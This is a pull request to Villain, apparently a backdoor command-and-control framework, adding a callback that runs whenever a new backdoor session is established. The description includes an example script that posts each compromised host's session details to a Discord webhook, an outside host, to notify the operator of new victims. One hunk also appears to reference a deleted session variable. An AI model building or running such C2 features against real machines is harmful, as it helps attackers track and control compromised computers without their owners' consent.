### PR TITLE
feat: add custom callback for every new connection resolve #106

### DIFF
--- a/Core/settings.py
+++ b/Core/settings.py
@@ -77,6 +77,10 @@ class TCP_Sock_Handler_Settings:
 	# Max failed echo response requests before a connection is characterized as lost
 	fail_count = 3
 
+class Callback_Settings:
+	callback_file = None
+	callback_function = None
+
 
 
 class Payload_Generator_Settings:

--- a/Core/villain_core.py
+++ b/Core/villain_core.py
@@ -1095,6 +1095,14 @@ class Hoaxshell(BaseHTTPRequestHandler):
 			Sessions_Manager.active_sessions[session_id]['Username'] = url_split[2]
 			print_to_prompt(f'\r[{GREEN}Shell{END}] Backdoor session established on {ORANGE}{self.client_address[0]}{END}')
 
+			if Callback_Settings.callback_file != None:
+				print_to_prompt(f'\r{GREEN}[Callback]{END} Executing callback function...{Callback_Settings.callback_file}')
+
+				if Callback_Settings.callback_function(Sessions_Manager.active_sessions[session_id]):
+					print_to_prompt(f'\r{GREEN}[Callback]{END} Callback function executed successfully.')
+				else:
+					print_to_prompt(f'\r{WARN}[Callback]{END} Callback function failed to execute.')
+
 			try:
 				Thread(target = self.monitor_shell_state, args = (session_id,), name = f'session_state_monitor_{self.client_address[0]}', daemon = True).start()
 			except:
@@ -1590,6 +1598,14 @@ class Core_Server:
 						print_to_prompt(f'\r[{GREEN}Shell{END}] Backdoor session established on {ORANGE}{Sessions_Manager.active_sessions[new_session_id]["IP Address"]}{END} (Owned by {ORANGE}{self.sibling_servers[sibling_id]["Hostname"]}{END})')
 						del decrypted_data, new_session_id
 						Core_Server.send_msg(conn, self.response_ack(sibling_id))
+
+						if Callback_Settings.callback_file != None:
+							print_to_prompt(f'\r{GREEN}[Callback]{END} Executing callback function...{Callback_Settings.callback_file}')
+
+							if Callback_Settings.callback_function(Sessions_Manager.active_sessions[session_id]):
+								print_to_prompt(f'\r{GREEN}[Callback]{END} Callback function executed successfully.')
+							else:
+								print_to_prompt(f'\r{WARN}[Callback]{END} Callback function failed to execute.')
 
 
 
@@ -2461,6 +2477,14 @@ class TCP_Sock_Multi_Handler:
 			Hoaxshell.command_pool[session_id] = []
 			print_to_prompt(f'\r[{GREEN}Shell{END}] Backdoor session established on {ORANGE}{address[0]}{END}')
 			print_to_prompt(f'\r[{WARN}] Failed to resolve hostname. Use "repair" to declare it manually.') if hostname_undefined else chill()
+
+			if Callback_Settings.callback_file != None:
+				print_to_prompt(f'\r{GREEN}[Callback]{END} Executing callback function...{Callback_Settings.callback_file}')
+
+				if Callback_Settings.callback_function(Sessions_Manager.active_sessions[session_id]):
+					print_to_prompt(f'\r{GREEN}[Callback]{END} Callback function executed successfully.')
+				else:
+					print_to_prompt(f'\r{WARN}[Callback]{END} Callback function failed to execute.')
 
 			new_session_data = deepcopy(Sessions_Manager.active_sessions[session_id])
 			new_session_data['session_id'] = session_id


### PR DESCRIPTION
## Add a callback feature
user can easily add python script as callback which will be executed. For example, I use this with discord webhook to get noification for every new backdoor connection.

usage: `python3 Villain.py -cb "/tmp/cb.py"`

**cb.py**
```
import requests
import os
import json
def callback(sess):
    # send discord message
    url = "#redacted"

    data = {
        "content": f"""```{sess}
        ```
        """
    }
    headers = {
        "Content-Type": "application/json"
    }
    response = requests.post(url, data=json.dumps(data), headers=headers)
    if response.status_code == 204:
        return 1
    else:
        return 0    
```